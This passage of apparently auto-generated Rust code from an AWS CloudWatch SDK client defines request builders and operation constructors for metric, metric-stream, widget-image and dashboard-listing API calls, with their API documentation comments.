/// Consumes the builder and constructs an Operation<[`GetMetricData`](crate::operation::GetMetricData)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricData,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_data(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricData::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricData",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricDataInput`](crate::input::GetMetricDataInput)
pub fn builder() -> crate::input::get_metric_data_input::Builder {
crate::input::get_metric_data_input::Builder::default()
}
}
/// See [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
pub mod get_metric_statistics_input {
/// A builder for [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) start_time: std::option::Option<smithy_types::Instant>,
pub(crate) end_time: std::option::Option<smithy_types::Instant>,
pub(crate) period: std::option::Option<i32>,
pub(crate) statistics: std::option::Option<std::vec::Vec<crate::model::Statistic>>,
pub(crate) extended_statistics: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) unit: std::option::Option<crate::model::StandardUnit>,
}
impl Builder {
/// <p>The namespace of the metric, with or without spaces.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The name of the metric, with or without spaces.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The time stamp that determines the first data point to return. Start times are
/// evaluated relative to the time that CloudWatch receives the request.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-03T23:00:00Z).</p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
pub fn start_time(mut self, input: smithy_types::Instant) -> Self {
self.start_time = Some(input);
self
}
pub fn set_start_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_time = input;
self
}
/// <p>The time stamp that determines the last data point to return.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-10T23:00:00Z).</p>
pub fn end_time(mut self, input: smithy_types::Instant) -> Self {
self.end_time = Some(input);
self
}
pub fn set_end_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_time = input;
self
}
/// <p>The granularity, in seconds, of the returned data points. For metrics with regular resolution, a period can
/// be as short as one minute (60 seconds) and must be a multiple of 60. For high-resolution metrics that are collected
/// at intervals of less than one minute, the period can be 1, 5, 10, 30, 60, or any multiple of 60. High-resolution metrics
/// are those metrics stored by a <code>PutMetricData</code> call that includes a <code>StorageResolution</code> of 1 second.</p>
/// <p>If the <code>StartTime</code> parameter specifies a time stamp that is greater than
/// 3 hours ago, you must specify the period as follows or no data points in that time range is returned:</p>
/// <ul>
/// <li>
/// <p>Start time between 3 hours and 15 days ago - Use a multiple of 60 seconds (1 minute).</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Use a multiple of 300 seconds (5 minutes).</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Use a multiple of 3600 seconds (1 hour).</p>
/// </li>
/// </ul>
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
pub fn statistics(mut self, input: impl Into<crate::model::Statistic>) -> Self {
let mut v = self.statistics.unwrap_or_default();
v.push(input.into());
self.statistics = Some(v);
self
}
pub fn set_statistics(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Statistic>>,
) -> Self {
self.statistics = input;
self
}
pub fn extended_statistics(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.extended_statistics.unwrap_or_default();
v.push(input.into());
self.extended_statistics = Some(v);
self
}
pub fn set_extended_statistics(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.extended_statistics = input;
self
}
/// <p>The unit for a given metric.
/// If you omit <code>Unit</code>, all data that was collected with any unit is returned, along with the corresponding units that were specified
/// when the data was reported to CloudWatch. If you specify a unit, the operation returns only data that was collected with that unit specified.
/// If you specify a unit that does not match the data collected, the results of the operation are null. CloudWatch does not perform unit conversions.</p>
pub fn unit(mut self, input: crate::model::StandardUnit) -> Self {
self.unit = Some(input);
self
}
pub fn set_unit(mut self, input: std::option::Option<crate::model::StandardUnit>) -> Self {
self.unit = input;
self
}
/// Consumes the builder and constructs a [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetMetricStatisticsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetMetricStatisticsInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
start_time: self.start_time,
end_time: self.end_time,
period: self.period,
statistics: self.statistics,
extended_statistics: self.extended_statistics,
unit: self.unit,
})
}
}
}
#[doc(hidden)]
pub type GetMetricStatisticsInputOperationOutputAlias = crate::operation::GetMetricStatistics;
#[doc(hidden)]
pub type GetMetricStatisticsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricStatisticsInput {
/// Consumes the builder and constructs an Operation<[`GetMetricStatistics`](crate::operation::GetMetricStatistics)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricStatistics,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_statistics(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricStatistics::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricStatistics",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
pub fn builder() -> crate::input::get_metric_statistics_input::Builder {
crate::input::get_metric_statistics_input::Builder::default()
}
}
/// See [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
pub mod get_metric_stream_input {
/// A builder for [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the metric stream to retrieve information about.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
/// Consumes the builder and constructs a [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetMetricStreamInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetMetricStreamInput { name: self.name })
}
}
}
#[doc(hidden)]
pub type GetMetricStreamInputOperationOutputAlias = crate::operation::GetMetricStream;
#[doc(hidden)]
pub type GetMetricStreamInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricStreamInput {
/// Consumes the builder and constructs an Operation<[`GetMetricStream`](crate::operation::GetMetricStream)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricStream,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_stream(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricStream::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricStream",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
pub fn builder() -> crate::input::get_metric_stream_input::Builder {
crate::input::get_metric_stream_input::Builder::default()
}
}
/// See [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
pub mod get_metric_widget_image_input {
/// A builder for [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) metric_widget: std::option::Option<std::string::String>,
pub(crate) output_format: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>A JSON string that defines the bitmap graph to be retrieved. The string includes the
/// metrics to include in the graph, statistics, annotations, title, axis limits, and so on.
/// You can include only one <code>MetricWidget</code> parameter in each <code>GetMetricWidgetImage</code> call.</p>
/// <p>For more information about the syntax of <code>MetricWidget</code> see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Metric-Widget-Structure.html">GetMetricWidgetImage: Metric Widget Structure and Syntax</a>.</p>
/// <p>If any metric on the graph could not load all the requested data points, an orange triangle with an exclamation
/// point appears next to the graph legend.</p>
pub fn metric_widget(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_widget = Some(input.into());
self
}
pub fn set_metric_widget(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.metric_widget = input;
self
}
/// <p>The format of the resulting image. Only PNG images are supported.</p>
/// <p>The default is <code>png</code>. If you specify <code>png</code>, the API returns an HTTP response with the
/// content-type set to <code>text/xml</code>. The image data is in a <code>MetricWidgetImage</code>
/// field. For example:</p>
/// <p>
/// <code>
/// <GetMetricWidgetImageResponse xmlns=<URLstring>></code>
/// </p>
/// <p>
/// <code> <GetMetricWidgetImageResult></code>
/// </p>
/// <p>
/// <code> <MetricWidgetImage></code>
/// </p>
/// <p>
/// <code> iVBORw0KGgoAAAANSUhEUgAAAlgAAAGQEAYAAAAip...</code>
/// </p>
/// <p>
/// <code> </MetricWidgetImage></code>
/// </p>
/// <p>
/// <code> </GetMetricWidgetImageResult></code>
/// </p>
/// <p>
/// <code> <ResponseMetadata></code>
/// </p>
/// <p>
/// <code> <RequestId>6f0d4192-4d42-11e8-82c1-f539a07e0e3b</RequestId></code>
/// </p>
/// <p>
/// <code> </ResponseMetadata></code>
/// </p>
/// <p>
/// <code></GetMetricWidgetImageResponse></code>
/// </p>
/// <p>The <code>image/png</code> setting is intended only for custom HTTP requests. For most
/// use cases, and all actions using an AWS SDK, you should use <code>png</code>. If you specify
/// <code>image/png</code>, the HTTP response has a content-type set to <code>image/png</code>,
/// and the body of the response is a PNG image. </p>
pub fn output_format(mut self, input: impl Into<std::string::String>) -> Self {
self.output_format = Some(input.into());
self
}
pub fn set_output_format(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.output_format = input;
self
}
/// Consumes the builder and constructs a [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetMetricWidgetImageInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetMetricWidgetImageInput {
metric_widget: self.metric_widget,
output_format: self.output_format,
})
}
}
}
#[doc(hidden)]
pub type GetMetricWidgetImageInputOperationOutputAlias = crate::operation::GetMetricWidgetImage;
#[doc(hidden)]
pub type GetMetricWidgetImageInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricWidgetImageInput {
/// Consumes the builder and constructs an Operation<[`GetMetricWidgetImage`](crate::operation::GetMetricWidgetImage)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricWidgetImage,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_widget_image(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricWidgetImage::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricWidgetImage",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
pub fn builder() -> crate::input::get_metric_widget_image_input::Builder {
crate::input::get_metric_widget_image_input::Builder::default()
}
}
/// See [`ListDashboardsInput`](crate::input::ListDashboardsInput)
pub mod list_dashboards_input {
/// A builder for [`ListDashboardsInput`](crate::input::ListDashboardsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_name_prefix: std::option::Option<std::string::String>,
pub(crate) next_token: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>If you specify this parameter, only
/// the dashboards with names starting with the specified string are listed. The maximum length is 255, and
/// valid characters are A-Z, a-z, 0-9, ".", "-", and "_".
/// </p>
pub fn dashboard_name_prefix(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_name_prefix = Some(input.into());
self
}
pub fn set_dashboard_name_prefix(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_name_prefix = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// Consumes the builder and constructs a [`ListDashboardsInput`](crate::input::ListDashboardsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::ListDashboardsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::ListDashboardsInput {
dashboard_name_prefix: self.dashboard_name_prefix,
next_token: self.next_token,
})
}
}
}
#[doc(hidden)]
pub type ListDashboardsInputOperationOutputAlias = crate::operation::ListDashboards;
#[doc(hidden)]
pub type ListDashboardsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListDashboardsInput {
/// Consumes the builder and constructs an Operation<[`ListDashboards`](crate::operation::ListDashboards)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListDashboards,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_list_dashboards(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListDashboards::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListDashboards",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListDashboardsInput`](crate::input::ListDashboardsInput)
pub fn builder() -> crate::input::list_dashboards_input::Builder {
crate::input::list_dashboards_input::Builder::default()
}
}
/// See [`ListMetricsInput`](crate::input::ListMetricsInput)
pub mod list_metrics_input {
/// A builder for [`ListMetricsInput`](crate::input::ListMetricsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::DimensionFilter>>,
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) recently_active: std::option::Option<crate::model::RecentlyActive>,
}
impl Builder {
/// <p>The metric namespace to filter against. Only the namespace that matches exactly
/// will be returned.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The name of the metric to filter against. Only the metrics with names that match exactly
/// will be returned.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::DimensionFilter>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::DimensionFilter>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>To filter the results to show only metrics that have had data points published
/// in the past three hours, specify this parameter
/// with a value of <code>PT3H</code>. This is the only valid value
/// for this parameter.</p>
/// <p>The results that are returned are an approximation of the value you specify. There
/// is a low probability that the returned results include metrics with last published
/// data as much as 40 minutes more than the specified time interval.</p>
pub fn recently_active(mut self, input: crate::model::RecentlyActive) -> Self {
self.recently_active = Some(input);
self
}
pub fn set_recently_active(
mut self,
input: std::option::Option<crate::model::RecentlyActive>,
) -> Self {
self.recently_active = input;
self
}
/// Consumes the builder and constructs a [`ListMetricsInput`](crate::input::ListMetricsInput)
pub fn build(
self,
) -> std::result::Result<crate::input::ListMetricsInput, smithy_http::operation::BuildError>
{
Ok(crate::input::ListMetricsInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
next_token: self.next_token,
recently_active: self.recently_active,
})
}
}
}
#[doc(hidden)]
pub type ListMetricsInputOperationOutputAlias = crate::operation::ListMetrics;
#[doc(hidden)]
pub type ListMetricsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListMetricsInput {
/// Consumes the builder and constructs an Operation<[`ListMetrics`](crate::operation::ListMetrics)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListMetrics,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_list_metrics(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListMetrics::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListMetrics",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
